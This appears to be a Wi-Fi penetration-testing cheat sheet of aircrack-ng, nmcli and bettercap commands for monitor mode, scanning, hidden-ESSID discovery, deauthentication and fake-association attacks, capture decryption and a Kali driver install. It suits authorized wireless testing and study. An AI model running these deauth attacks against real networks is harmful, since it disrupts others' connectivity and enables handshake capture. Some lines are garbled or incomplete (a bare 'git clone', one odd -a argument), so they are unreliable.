Generic Commands
Your card should be able to make injection in monitor mode you can check with the command iw list
Monitor modeâ
Ask NetworkManager to not manage your interface
nmcli dev set <interface> managed no
Start Monitor mode
ifconfig <wlan1> down
iwconfig <wlan1> mode monitor
ifconfig <wlan1> up
If possible, do not perform the airmon-ng check kill
airmon-ng check <wlan1>
airmon-ng check kill
airmon-ng start <wlan1> <channel>
airmon-ng start <wlan1> --band <abg>
Stop monitor mode
ifconfig <wlan1> down
iwconfig <wlan1> mode managed
ifconfig <wlan1> up
airmon-ng stop <wlan1mon>
service network-manager start
airodump-ng <wlan1mon>
airodump-ng <wlan1mon> -c <channel> --bssid <bssid> [-a] -w <out>
nmcli -c yes dev wifi list --rescan yes
iw dev <wlan1> scan
Uncovering hidden ESSIDsâ
Passive way
Check for probe requests from airodump or via wireshark by filtering all non-beacon packets.
wlan.bssid == <ap_mac> && !(wlan.fc.type_subtype == 0x08)
Active way
Deautentication attack to force the reauthentication.
aireplay-ng -0 5 -a <supplicant_mac> --ignore-negative <wlan1mon>
One packet for association
aireplay-ng -1 0 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>
Association with keep-alive
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>
If nb_deauth is 0 it means continuously. You can try option -D if you can't deauth on 5GHz frequency.
aireplay-ng -0 <nb_deauth> -a <ap_mac> -c <supplicant_mac> <wlan1mon>
In airodump PWR should be dropped to 0.
Deauthenticate with broadcast address
aireplay-ng -0 20 -a <ap_mac> -c FF:FF:FF:FF:FF:FF <wlan1mon>
Decrypt capture filesâ
For WPA/WPA2 encryption, at least handshake packets 2-3 or 3-4 are necessary.
airdecap-ng -e <essid> -p <PSK> [-b <ap_mac>] <cap_file>
airtun-ng -a <ap_mac_source> --repeat [--bssid <ap_mac_source_filtering>] -i <mon0_source> <mon1_dest>
Install the Alfa AWUS1900 (RTL8814AU) driver in Kaliâ
RTL8814AU chipset is no longer supported in the realtek-rtl88xxau-dkms driver.
apt remove realtek-rtl88xxau-dkms
apt install dkms build-essential libelf-dev linux-headers-`uname -r`
cd /opt
git clone
cd rtl8814au
make dkms_install
To remove the driver use the command below.
make dkms_remove
apt install golang libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
/opt/bettercap -eval "caplets.update; q"
/opt/bettercap -eval "caplets.update; ui.update; q"
Start GUIâ
/opt/bettercap -caplet "http-ui"